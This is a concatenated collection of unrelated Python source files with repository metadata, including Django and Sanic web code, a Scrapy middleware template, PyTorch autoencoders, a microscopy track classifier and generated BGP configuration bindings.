" VALUES (%s,%s,%s,%s,%s,%s,%s)"
" on duplicate key update `count` = `count`+1 ,"
" `count_" + attribute + "_" + label + "`=`count_" + attribute + "_" + label + "`+1",
(first, second, topic, year, month, day, 1))
db.commit()
except Exception:
print(id,topic,attribute)
print(traceback.format_exc())
continue
"""
Quando le invormazioni del tweet vengono aggregate al conteggio giornaliero, il tweet viene 'backuppato'
"""
cur.execute(" INSERT INTO `tweet_backup`"
" select * "
" from tweet_to_daily_token_frequency where id=%s and topic=%s"
" on duplicate key update tweet_backup.id=tweet_backup.id",(id,topic))
db.commit()
cur.execute("delete from tweet_to_daily_token_frequency where id=%s and topic=%s",(id,topic))
db.commit()
#elimina token che nello storico sono poco significativi
cur.execute(" DELETE FROM daily_word_frequency "
" WHERE `count` <= 10")
db.commit()
#elimina token che nello storico sono poco significativi
cur.execute(" DELETE FROM daily_co_occurrence_word_frequency "
" WHERE `count` <= 10")
db.commit()
|
[
"mirko.lai.1987@gmail.com"
] |
mirko.lai.1987@gmail.com
|
dd18cdfbe69501f2406c26d36533b743dac44f83
|
b7eed26cf8a0042a61f555eed1e9bf0a3227d490
|
/students/semko_krzysztof/lesson_03_functions/negative_exponent.py
|
b4640e7d2c59c35ccf9a141a0a0f8dab95daf156
|
[] |
no_license
|
jedzej/tietopythontraining-basic
|
e8f1ac5bee5094c608a2584ab19ba14060c36dbe
|
a68fa29ce11942cd7de9c6bbea08fef5541afa0f
|
refs/heads/master
| 2021-05-11T11:10:05.110242
| 2018-08-20T12:34:55
| 2018-08-20T12:34:55
| 118,122,178
| 14
| 84
| null | 2018-08-24T15:53:04
| 2018-01-19T12:23:02
|
Python
|
UTF-8
|
Python
| false
| false
| 506
|
py
|
"""
Given a positive real number a and integer n.
Compute a^n. Write a function power(a, n) to calculate
the results using the function and print the result of the expression
Don't use the same function from the standard library.
"""
print("Operation a ^ n :")
print("Please input the 'a' value:")
a = float(input())
print("Please input the 'n' value:")
n = int(input())
result = a
for i in range(1, abs(n)):
result *= a
if n < 0:
result = 1 / result
print("Result of a ^ n = " + str(result))
|
[
"krzysztof.semko@tieto.com"
] |
krzysztof.semko@tieto.com
|
e0196b9f2b975623a626b2f8e5e6443c6e5b41ef
|
95ac17da0188566c94c4c77fc416c5c1248d01ea
|
/leadmanager/leads/migrations/0001_initial.py
|
9d93db98d1177a4ff4af7e16bf19e38cb1ed13e7
|
[] |
no_license
|
andrew-cmdltt/react-django-app
|
a92ae6ab7451daccade2f498260182d90cef4259
|
83618b6aef353587932705f821aac3c8981a706a
|
refs/heads/master
| 2022-10-24T09:30:01.222069
| 2020-06-17T13:14:35
| 2020-06-17T13:14:35
| 272,444,949
| 0
| 0
| null | 2020-06-17T13:16:05
| 2020-06-15T13:22:09
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 707
|
py
|
# Generated by Django 3.0.7 on 2020-06-14 21:14
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Lead',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=100)),
('email', models.EmailField(max_length=100, unique=True)),
('message', models.CharField(blank=True, max_length=500)),
('created_at', models.DateTimeField(auto_now_add=True)),
],
),
]
|
[
"menwhohas2279@gmail.com"
] |
menwhohas2279@gmail.com
|
918abb74e5bf9d3abb3964645d084e60ae5f9159
|
fa7a704b564c445cfd9178ca5c6a789854c84e77
|
/Article/forms.py
|
21d8b51ee19a98a8f04132e0fa4527f8d166cd1a
|
[
"MIT"
] |
permissive
|
surenjanath/Django-Medium-Article
|
17891dce096fb14e9a4de70a0bdf8d701ccd7361
|
b9a4e4aa29edfeb4c0260a4a365c24fdb9f4b0b8
|
refs/heads/master
| 2023-08-06T18:47:25.876461
| 2021-10-01T14:05:24
| 2021-10-01T14:05:24
| 411,857,323
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,333
|
py
|
from django import forms
class FeedbackForm(forms.Form):
Name = forms.CharField(
max_length = 30,
widget = forms.TextInput(
attrs={'class' : 'form-control',
'type' : 'text',
'id' : 'name',
'placeholder' : 'Enter Your Name',
'name' : 'name',
}
)
)
Email = forms.CharField(
max_length = 50,
widget = forms.TextInput(
attrs={'class' : 'form-control',
'type' : 'text',
'id' : 'email',
'placeholder' : 'Enter Your Email',
'name' : 'email',
}
)
)
Feedback = forms.CharField(
max_length = 1000,
widget = forms.TextInput(
attrs={'class' : 'form-control',
'id' : 'message',
'placeholder' : 'Enter Your Feedback',
'name' : 'message',
'rows' : '3',
}
)
)
|
[
"surenjanath.singh@gmail.com"
] |
surenjanath.singh@gmail.com
|
4b6c958cfa881db8ce637ba6a474e9f1ad8d79cc
|
2df5d06ec25dd449d5905bc5e2fd8acf8b8f5d50
|
/trichotracking/trackkeeper/_classifier.py
|
b9a49a2f6473cb3e6039deff8f44be4d6be93eda
|
[] |
no_license
|
giuliaschneider/Trichotracking
|
d702599676484577db41c5adebb4a85280faf45d
|
deb1be2626ac662a2b9c26de90bb323c8e10eafd
|
refs/heads/master
| 2020-06-19T15:13:31.816888
| 2019-09-05T13:52:12
| 2019-09-05T13:52:12
| 196,754,883
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,707
|
py
|
import numpy as np
import pandas as pd
from trichotracking.dfmanip import combineNanCols, groupdf, listToColumns
def getSingleFilamentTracks(df, dfg, aggTracks):
""" Returns trackNrs of for sure single filaments. """
# Calculate length variation dependent on length
dfg.loc[:, 'length_std_n'] = dfg.loc[:, 'length_std'] \
/ dfg.loc[:, 'length_mean']
dfg.loc[:, 'area_std_n'] = dfg.loc[:, 'area_std'] / dfg.loc[:, 'area_mean']
fsingleTracks1 = dfg[((~dfg['trackNr'].isin(aggTracks))
& (dfg['eccentricity_mean'] > 0.98)
& (dfg['length_std_n'] < 0.04)
& (dfg['nFrames'] > 4))].trackNr.values
fsingleTracks2 = dfg[((~dfg['trackNr'].isin(aggTracks))
& (dfg['eccentricity_mean'] > 0.93)
& (dfg['length_std_n'] < 0.02)
& (dfg['nFrames'] > 4))].trackNr.values
fsingleTracks = np.append(fsingleTracks1, fsingleTracks2)
fsingleTracks = np.unique(fsingleTracks)
return fsingleTracks
def get2FilamentTracks(df, dfg, dfagg, fsingleTracks=[]):
""" Returns trackNrs of for aligned 2 filament particles. """
ffilTracks = dfagg[dfagg.n == 2].trackNr.values
filAlignedTracks = dfg[((dfg['trackNr'].isin(ffilTracks))
& (dfg['ews_mean'] < 0.02)
& (dfg['nFrames'] > 4))].trackNr.values
filCrossTracks = dfg[((dfg['trackNr'].isin(ffilTracks))
& (dfg['ews_mean'] >= 0.02)
& (dfg['nFrames'] > 4))].trackNr.values
if len(fsingleTracks) > 0:
ffilTracks2 = dfagg[((dfagg.trackNr.isin(ffilTracks))
& ((dfagg.tracks00.isin(fsingleTracks)) | (dfagg.tracks00.isnull()))
& ((dfagg.tracks01.isin(fsingleTracks)) | (dfagg.tracks01.isnull()))
& ((dfagg.tracks10.isin(fsingleTracks)) | (dfagg.tracks10.isnull()))
& ((dfagg.tracks11.isin(fsingleTracks)) | (dfagg.tracks11.isnull())))].trackNr.values
filAlignedTracks = np.intersect1d(filAlignedTracks, ffilTracks2)
filCrossTracks = np.intersect1d(filCrossTracks, ffilTracks2)
dfagg = dfagg.join(dfg[['trackNr', 'length_mean']].set_index('trackNr'), on='deftrack1', rsuffix='1')
dfagg = dfagg.join(dfg[['trackNr', 'length_mean']].set_index('trackNr'), on='deftrack2', rsuffix='2')
dfagg['length_fraction'] = pd.DataFrame(
{'1': dfagg['length_mean'] / dfagg['length_mean2'], '2': dfagg['length_mean2'] / dfagg['length_mean']}).min(
axis=1)
dfagg = dfagg.join(dfg[['trackNr', 'ews_mean']].set_index('trackNr'), on='trackNr')
dfagg = dfagg.join(dfg[['trackNr', 'min_box_w_mean']].set_index('trackNr'), on='trackNr')
dfagg = dfagg.join(dfg[['trackNr', 'min_box_h_mean']].set_index('trackNr'), on='trackNr')
dfagg['min_box_fraction'] = pd.DataFrame({'1': dfagg['min_box_w_mean'] / dfagg['min_box_h_mean'],
'2': dfagg['min_box_h_mean'] / dfagg['min_box_w_mean']}).min(axis=1)
trueAlignedTracks = dfagg[dfagg.length_fraction / 2 > dfagg.min_box_fraction].trackNr.values
filAlignedTracks = np.intersect1d(filAlignedTracks, trueAlignedTracks)
return filAlignedTracks, filCrossTracks
def segment_filaments(df, dfagg):
""" Segments particle tracks into single and fil-fil tracks.
Postional arguments:
--------------------
dfaggFile : path to dfagg-textfile
dflinkedFile : path to dflinked - textfile
Returns:
--------
singleTracks : trackNrs of certain single tracks
ffilTracks : trackNrs of aligned filament-filaments iteractions
dfagg : dataframe of aggegrates
df : dataframe of all tracks
dfg : grouped dataframe
"""
# Split list into single columns
dfagg = dfagg.copy()
dfagg = listToColumns(dfagg, 'tracks0', ['tracks00', 'tracks01'])
dfagg = listToColumns(dfagg, 'tracks1', ['tracks10', 'tracks11'])
# Create column which has either trackNr before merge or after split
dfagg = combineNanCols(dfagg, 'deftracks', 'tracks0', 'tracks1')
# Split column
dfagg = listToColumns(dfagg, 'deftracks', ['deftrack1', 'deftrack2'])
aggTracks = dfagg.trackNr.values
# Import dflinked
if not 'ews' in df.keys():
df['ews'] = df.ew2 / df.ew1
# Group
dfg = groupdf(df)
fsingleTracks = getSingleFilamentTracks(df, dfg, aggTracks)
filAlignedTracks, filCrossTracks = get2FilamentTracks(df, dfg, dfagg, fsingleTracks)
return fsingleTracks, filAlignedTracks, filCrossTracks
|
[
"giuliasc@student.ethz.ch"
] |
giuliasc@student.ethz.ch
|
9e83adce421bf9c78cabb3b50571669ffbedde74
|
b231e8be9f921a927779cb87debba9db268f4166
|
/models/representation_learning/autoencoder.py
|
b79489e6515f88182d167ffd02d7a0b91a74b161
|
[
"MIT"
] |
permissive
|
clairebub/interpretability
|
f98d42f52bf4c257e7b173deaf8abf0ef07c5111
|
8c71bbc976ce9382705a2395ad651da009ab4785
|
refs/heads/master
| 2022-07-22T05:15:26.728673
| 2020-03-12T06:43:02
| 2020-03-12T06:43:02
| 246,754,616
| 0
| 0
|
MIT
| 2022-06-22T01:22:08
| 2020-03-12T05:52:11
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 3,366
|
py
|
import torch
import torchvision
import torch.nn.functional as F
from torch import nn
from torch.autograd import Variable
from torch.utils.data import DataLoader
from torchvision import transforms
from torchvision.utils import save_image
from torchvision.datasets import MNIST
import os
class SimpleAutoEncoder(nn.Module):
def __init__(self):
super(SimpleAutoEncoder, self).__init__()
self.encoder = nn.Sequential(
nn.Linear(28 * 28, 128),
nn.ReLU(True),
nn.Linear(128, 64),
nn.ReLU(True), nn.Linear(64, 12), nn.ReLU(True), nn.Linear(12, 3))
self.decoder = nn.Sequential(
nn.Linear(3, 12),
nn.ReLU(True),
nn.Linear(12, 64),
nn.ReLU(True),
nn.Linear(64, 128),
nn.ReLU(True), nn.Linear(128, 28 * 28), nn.Tanh())
def forward(self, x):
x = self.encoder(x)
x = self.decoder(x)
return x
class ConvAutoEncoder(nn.Module):
def __init__(self):
super(ConvAutoEncoder, self).__init__()
self.encoder = nn.Sequential(
nn.Conv2d(1, 16, 3, stride=3, padding=1), # b, 16, 10, 10
nn.ReLU(True),
nn.MaxPool2d(2, stride=2), # b, 16, 5, 5
nn.Conv2d(16, 8, 3, stride=2, padding=1), # b, 8, 3, 3
nn.ReLU(True),
nn.MaxPool2d(2, stride=1) # b, 8, 2, 2
)
self.decoder = nn.Sequential(
nn.ConvTranspose2d(8, 16, 3, stride=2), # b, 16, 5, 5
nn.ReLU(True),
nn.ConvTranspose2d(16, 8, 5, stride=3, padding=1), # b, 8, 15, 15
nn.ReLU(True),
nn.ConvTranspose2d(8, 1, 2, stride=2, padding=1), # b, 1, 28, 28
nn.Tanh()
)
def forward(self, x):
x = self.encoder(x)
x = self.decoder(x)
return x
class VAE(nn.Module):
def __init__(self):
super(VAE, self).__init__()
self.fc1 = nn.Linear(784, 400)
self.fc21 = nn.Linear(400, 20)
self.fc22 = nn.Linear(400, 20)
self.fc3 = nn.Linear(20, 400)
self.fc4 = nn.Linear(400, 784)
def encode(self, x):
h1 = F.relu(self.fc1(x))
return self.fc21(h1), self.fc22(h1)
def reparametrize(self, mu, logvar):
std = logvar.mul(0.5).exp_()
if torch.cuda.is_available():
eps = torch.cuda.FloatTensor(std.size()).normal_()
else:
eps = torch.FloatTensor(std.size()).normal_()
eps = Variable(eps)
return eps.mul(std).add_(mu)
def decode(self, z):
h3 = F.relu(self.fc3(z))
return F.sigmoid(self.fc4(h3))
def loss_function(recon_x, x, mu, logvar):
"""
recon_x: generating images
x: origin images
mu: latent mean
logvar: latent log variance
"""
reconstruction_function = nn.MSELoss(size_average=False)
BCE = reconstruction_function(recon_x, x) # mse loss
# loss = 0.5 * sum(1 + log(sigma^2) - mu^2 - sigma^2)
KLD_element = mu.pow(2).add_(logvar.exp()).mul_(-1).add_(1).add_(logvar)
KLD = torch.sum(KLD_element).mul_(-0.5)
# KL divergence
return BCE + KLD
def forward(self, x):
mu, logvar = self.encode(x)
z = self.reparametrize(mu, logvar)
return self.decode(z), mu, logvar
|
[
"claire.smurfs@gmail.com"
] |
claire.smurfs@gmail.com
|
fb2073058ec3e55b7eb981a04172b31ef58a3181
|
cdd462f8d349c8de5cb5997dac8a952cc52f8f87
|
/quadratic.py
|
09cbaa61626b20bd03d054eed42246202497a58f
|
[] |
no_license
|
CynthiaW19/python
|
59bec0f47128ffb611b4ac294ea75080f616ecfc
|
04f574d29c81282cbdf8799d14e93c5a14338491
|
refs/heads/master
| 2021-01-21T22:19:10.224055
| 2017-11-27T20:44:05
| 2017-11-27T20:44:05
| 102,148,855
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 289
|
py
|
def roots(a, b, c):
D = (b*b - 4*a*c)**0.5
x_1 = (-b + D)/(2*a)
x_2 = (-b - D)/(2*a)
print('x1: {0}'.format(x_1))
print('x2: {0}'.format(x_2))
if __name__ == '__main__':
a = input('Enter a: ')
b = input('Enter b: ')
c = input('Enter c: ')
roots(float(a), float(b), float(c))
|
[
"noreply@github.com"
] |
CynthiaW19.noreply@github.com
|
cc894ecbfbe9fb9fd95391f173bc4b2009ea4b09
|
3d9315da397393cfe2548975340a461676e09f43
|
/blog/admin/fields.py
|
3bfe2b014ee0f08df16b5f510f4a91b48d34b466
|
[] |
no_license
|
flylixiaolong/zblog
|
d5c6c67ee88878d7d69a02d9fc6aac2b0e847a07
|
27ad03d4406487e82e00764d6b2f21ead49fd882
|
refs/heads/master
| 2020-03-22T14:22:02.947041
| 2018-07-30T14:08:59
| 2018-07-30T14:08:59
| 140,173,924
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 859
|
py
|
from flask_restful import fields
catalog_fields = {
'id': fields.Integer,
'catalog': fields.String,
'created_at': fields.DateTime(dt_format='iso8601'),
'updated_at': fields.DateTime(dt_format='iso8601')
}
catalogs_fields = {
'data': fields.List(fields.Nested(catalog_fields))
}
tag_fields = {
'id': fields.Integer,
'tag': fields.String,
'created_at': fields.DateTime(dt_format='iso8601'),
'updated_at': fields.DateTime(dt_format='iso8601')
}
post_fields = {
'id': fields.Integer,
'title': fields.String,
'summary': fields.String,
'content': fields.String,
'created_at': fields.DateTime(dt_format='iso8601'),
'updated_at': fields.DateTime(dt_format='iso8601')
}
comment_fields = {
'id': fields.Integer,
'name': fields.String,
'email': fields.String,
'content': fields.String
}
|
[
"fly_lxl@foxmail.com"
] |
fly_lxl@foxmail.com
|
8a00aabd8f7d244451bb48f691205665c5b2795d
|
6c98c0aff2adf038869552eed51b81553335122e
|
/zufang_spider/zufang_spider/middlewares.py
|
85586e714d3f22fd4d7ac1fc8da56422a42f31f5
|
[] |
no_license
|
junhao99/zufang_info
|
cbcc987cf2b4d912134f557ce5328ddf5e4a8dc5
|
25dd5bf9f78dd767bb05d571ac73d601c0aca0cc
|
refs/heads/master
| 2020-03-23T15:50:42.692226
| 2018-08-15T12:33:26
| 2018-08-15T12:33:26
| 141,778,223
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,609
|
py
|
# -*- coding: utf-8 -*-
# Define here the models for your spider middleware
#
# See documentation in:
# https://doc.scrapy.org/en/latest/topics/spider-middleware.html
from scrapy import signals
class ZufangSpiderSpiderMiddleware(object):
# Not all methods need to be defined. If a method is not defined,
# scrapy acts as if the spider middleware does not modify the
# passed objects.
@classmethod
def from_crawler(cls, crawler):
# This method is used by Scrapy to create your spiders.
s = cls()
crawler.signals.connect(s.spider_opened, signal=signals.spider_opened)
return s
def process_spider_input(self, response, spider):
# Called for each response that goes through the spider
# middleware and into the spider.
# Should return None or raise an exception.
return None
def process_spider_output(self, response, result, spider):
# Called with the results returned from the Spider, after
# it has processed the response.
# Must return an iterable of Request, dict or Item objects.
for i in result:
yield i
def process_spider_exception(self, response, exception, spider):
# Called when a spider or process_spider_input() method
# (from other spider middleware) raises an exception.
# Should return either None or an iterable of Response, dict
# or Item objects.
pass
def process_start_requests(self, start_requests, spider):
# Called with the start requests of the spider, and works
# similarly to the process_spider_output() method, except
# that it doesn’t have a response associated.
# Must return only requests (not items).
for r in start_requests:
yield r
def spider_opened(self, spider):
spider.logger.info('Spider opened: %s' % spider.name)
class ZufangSpiderDownloaderMiddleware(object):
# Not all methods need to be defined. If a method is not defined,
# scrapy acts as if the downloader middleware does not modify the
# passed objects.
@classmethod
def from_crawler(cls, crawler):
# This method is used by Scrapy to create your spiders.
s = cls()
crawler.signals.connect(s.spider_opened, signal=signals.spider_opened)
return s
def process_request(self, request, spider):
# Called for each request that goes through the downloader
# middleware.
# Must either:
# - return None: continue processing this request
# - or return a Response object
# - or return a Request object
# - or raise IgnoreRequest: process_exception() methods of
# installed downloader middleware will be called
return None
def process_response(self, request, response, spider):
# Called with the response returned from the downloader.
# Must either;
# - return a Response object
# - return a Request object
# - or raise IgnoreRequest
return response
def process_exception(self, request, exception, spider):
# Called when a download handler or a process_request()
# (from other downloader middleware) raises an exception.
# Must either:
# - return None: continue processing this exception
# - return a Response object: stops process_exception() chain
# - return a Request object: stops process_exception() chain
pass
def spider_opened(self, spider):
spider.logger.info('Spider opened: %s' % spider.name)
|
[
"1258884157@qq.com"
] |
1258884157@qq.com
|
20cbbb48dbd67f8e60c7a07a9a3a16018b2bb8d4
|
c57821d96fff756251fe646eab15ebada3037f65
|
/transport/sanic/endpoints/users/user_login.py
|
0b5456473e8e719bde88a69ddbf918bab649e17e
|
[] |
no_license
|
hyperman98/NapoleonITPython
|
cf258e510edc8215056e06a8382dd365929a3a00
|
4d871d63206b546bd6b52670af0ddd9c9dbd6e6e
|
refs/heads/master
| 2023-02-26T18:27:56.291674
| 2021-02-04T11:24:36
| 2021-02-04T11:24:36
| 335,350,054
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,496
|
py
|
from sanic.request import Request
from sanic.response import BaseHTTPResponse
from api.request import RequestPatchUserLoginDto
from db.database import DBSession
from db.exceptions import DBIntegrityException, DBDataException, DBUserDeletedException, DBUserAlreadyExistsException
from db.queries import user as user_queries
from transport.sanic.endpoints import BaseEndpoint
from transport.sanic.exceptions import SanicDBException, SanicUserDeletedException
class ChangeLoginEndpoint(BaseEndpoint):
async def method_patch(
self, request: Request, body: dict, session: DBSession, user_id: int, token: dict, *args, **kwargs
) -> BaseHTTPResponse:
# проверяем, что пользователь посылает запрос от своего имени
if token.get('id') != user_id:
return await self.make_response_json(status=403)
request_model = RequestPatchUserLoginDto(body)
try:
user_queries.change_login(session, request_model.login, user_id)
except DBUserAlreadyExistsException:
return await self.make_response_json(status=409, message='User already exists')
except DBUserDeletedException:
raise SanicUserDeletedException('User deleted')
try:
session.commit_session()
except (DBIntegrityException, DBDataException) as error:
raise SanicDBException(str(error))
return await self.make_response_json(status=200)
|
[
"xhuman80@gmail.com"
] |
xhuman80@gmail.com
|
41aa8448f402077b23d848d005c647dc4a948aed
|
be0120c72c636afadca117518b3ca3c69412dd64
|
/ifElseAss.py
|
c167730e56850115ee4ff41ff4e989f907a6e1ce
|
[] |
no_license
|
adhiambokonyango/Python
|
b2a6c91d85c8949ec3b55e6ec591a452d075b504
|
91865b44c8c544ed3c4935979bfa7d9be3f5dc52
|
refs/heads/master
| 2021-01-06T09:49:54.492587
| 2020-02-18T06:15:27
| 2020-02-18T06:15:27
| 241,286,388
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 180
|
py
|
age = int(input('enter age:'))
price = 30
if age >= 65:
print('price is', price*0.5)
elif age < 6:
print('price is null')
else:
print('price is ', price)
|
[
"noreply@github.com"
] |
adhiambokonyango.noreply@github.com
|
c63c8f4e49da3cd7207c53bc9e50125f115cc895
|
de4b601e50cc73f63c3cb812c347e8fd4b50e269
|
/Python/124BinaryTreeMaximumPathSum/dfs.py
|
a2bf52f4140c00072366122cc248e67f93574492
|
[] |
no_license
|
siddharthkale97/Leetcode-Problems-Tracker
|
f8867eada62d6261a62cfc2f79d021b0dce7e9e7
|
1df6fc3baa4b9d716cabfd791911e2fdc9db08ba
|
refs/heads/main
| 2023-08-02T04:20:32.695643
| 2021-10-08T05:44:03
| 2021-10-08T05:44:03
| 396,057,065
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 690
|
py
|
# Definition for a binary tree node.
class TreeNode:
def __init__(self, val=0, left=None, right=None):
self.val = val
self.left = left
self.right = right
class Solution:
def maxPathSum(self, root: Optional[TreeNode]) -> int:
res = [root.val]
def dfs(root):
if not root:
return 0
leftMax = dfs(root.left)
rightMax = dfs(root.right)
leftMax = max(leftMax,0)
rightMax = max(rightMax,0)
res[0] = max(res[0], root.val + leftMax + rightMax)
return root.val + max(leftMax, rightMax)
dfs(root)
return res[0]
|
[
"siddharthkale97@gmail.com"
] |
siddharthkale97@gmail.com
|
7ac005eb42f091c51ab83c544466c0b346ebb421
|
51f887286aa3bd2c3dbe4c616ad306ce08976441
|
/pybind/slxos/v17r_1_01a/routing_system/router/router_bgp/address_family/ipv4/ipv4_unicast/af_vrf/neighbor/af_ipv4_vrf_neighbor_address_holder/af_ipv4_neighbor_addr/__init__.py
|
04c42af43f0958e01b8c6d558ea778ef0e670444
|
[
"Apache-2.0"
] |
permissive
|
b2220333/pybind
|
a8c06460fd66a97a78c243bf144488eb88d7732a
|
44c467e71b2b425be63867aba6e6fa28b2cfe7fb
|
refs/heads/master
| 2020-03-18T09:09:29.574226
| 2018-04-03T20:09:50
| 2018-04-03T20:09:50
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 124,806
|
py
|
from operator import attrgetter
import pyangbind.lib.xpathhelper as xpathhelper
from pyangbind.lib.yangtypes import RestrictedPrecisionDecimalType, RestrictedClassType, TypedListType
from pyangbind.lib.yangtypes import YANGBool, YANGListType, YANGDynClass, ReferenceType
from pyangbind.lib.base import PybindBase
from decimal import Decimal
from bitarray import bitarray
import __builtin__
import shutdown
import af_vrf_neighbor_capability
import filter_list
import maximum_prefix
import default_originate
import prefix_list
import neighbor_route_map
import unsuppress_map
import additional_paths
import local_as
import next_hop_self
import advertisement_interval
import ebgp_multihop
import enforce_first_as
import timers
import soft_reconfiguration
import bfd
import maxas_limit
import update_source
import send_community
class af_ipv4_neighbor_addr(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module brocade-common-def - based on the path /routing-system/router/router-bgp/address-family/ipv4/ipv4-unicast/af-vrf/neighbor/af-ipv4-vrf-neighbor-address-holder/af-ipv4-neighbor-addr. Each member element of
the container is represented as a class variable - with a specific
YANG type.
"""
__slots__ = ('_pybind_generated_by', '_path_helper', '_yang_name', '_rest_name', '_extmethods', '__af_ipv4_neighbor_address','__remote_as','__shutdown','__af_vrf_neighbor_capability','__allowas_in','__filter_list','__maximum_prefix','__default_originate','__prefix_list','__neighbor_route_map','__route_reflector_client','__unsuppress_map','__af_nei_weight','__enable_peer_as_check','__additional_paths','__associate_peer_group','__description','__local_as','__next_hop_self','__advertisement_interval','__ebgp_btsh','__ebgp_multihop','__password','__enforce_first_as','__timers','__remove_private_as','__as_override','__soft_reconfiguration','__static_network_edge','__bfd','__maxas_limit','__update_source','__send_community','__activate',)
_yang_name = 'af-ipv4-neighbor-addr'
_rest_name = 'af-ipv4-neighbor-addr'
_pybind_generated_by = 'container'
def __init__(self, *args, **kwargs):
path_helper_ = kwargs.pop("path_helper", None)
if path_helper_ is False:
self._path_helper = False
elif path_helper_ is not None and isinstance(path_helper_, xpathhelper.YANGPathHelper):
self._path_helper = path_helper_
elif hasattr(self, "_parent"):
path_helper_ = getattr(self._parent, "_path_helper", False)
self._path_helper = path_helper_
else:
self._path_helper = False
extmethods = kwargs.pop("extmethods", None)
if extmethods is False:
self._extmethods = False
elif extmethods is not None and isinstance(extmethods, dict):
self._extmethods = extmethods
elif hasattr(self, "_parent"):
extmethods = getattr(self._parent, "_extmethods", None)
self._extmethods = extmethods
else:
self._extmethods = False
self.__default_originate = YANGDynClass(base=default_originate.default_originate, is_container='container', presence=False, yang_name="default-originate", rest_name="default-originate", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-compact-syntax': None, u'info': u'Originate default route to peer', u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)
self.__activate = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="activate", rest_name="activate", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Allow exchange of route in the current family mode', u'cli-run-template': u'$(.?\\r:no neighbor $(../af-ipv4-neighbor-address) activate\n)', u'cli-full-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='empty', is_config=True)
self.__shutdown = YANGDynClass(base=shutdown.shutdown, is_container='container', presence=False, yang_name="shutdown", rest_name="shutdown", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-compact-syntax': None, u'info': u'Administratively shut down this neighbor', u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)
self.__ebgp_btsh = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="ebgp-btsh", rest_name="ebgp-btsh", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Enable EBGP TTL Security Hack Protection', u'cli-full-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='empty', is_config=True)
self.__enable_peer_as_check = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="enable-peer-as-check", rest_name="enable-peer-as-check", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Disable routes advertise between peers in same AS', u'cli-full-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='empty', is_config=True)
self.__af_ipv4_neighbor_address = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_dict={'pattern': u'(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'}), is_leaf=True, yang_name="af-ipv4-neighbor-address", rest_name="address", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'A.B.C.D;;Neighbor Address', u'alt-name': u'address'}}, is_keyval=True, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='inet:ipv4-address', is_config=True)
self.__route_reflector_client = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="route-reflector-client", rest_name="route-reflector-client", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Configure a neighbor as Route Reflector client', u'cli-full-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='empty', is_config=True)
self.__unsuppress_map = YANGDynClass(base=unsuppress_map.unsuppress_map, is_container='container', presence=False, yang_name="unsuppress-map", rest_name="unsuppress-map", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Route-map to selectively unsuppress suppressed routes', u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)
self.__remove_private_as = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="remove-private-as", rest_name="remove-private-as", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Remove private AS number from outbound updates', u'cli-full-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='empty', is_config=True)
self.__as_override = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="as-override", rest_name="as-override", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Override matching AS-number while sending update'}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='empty', is_config=True)
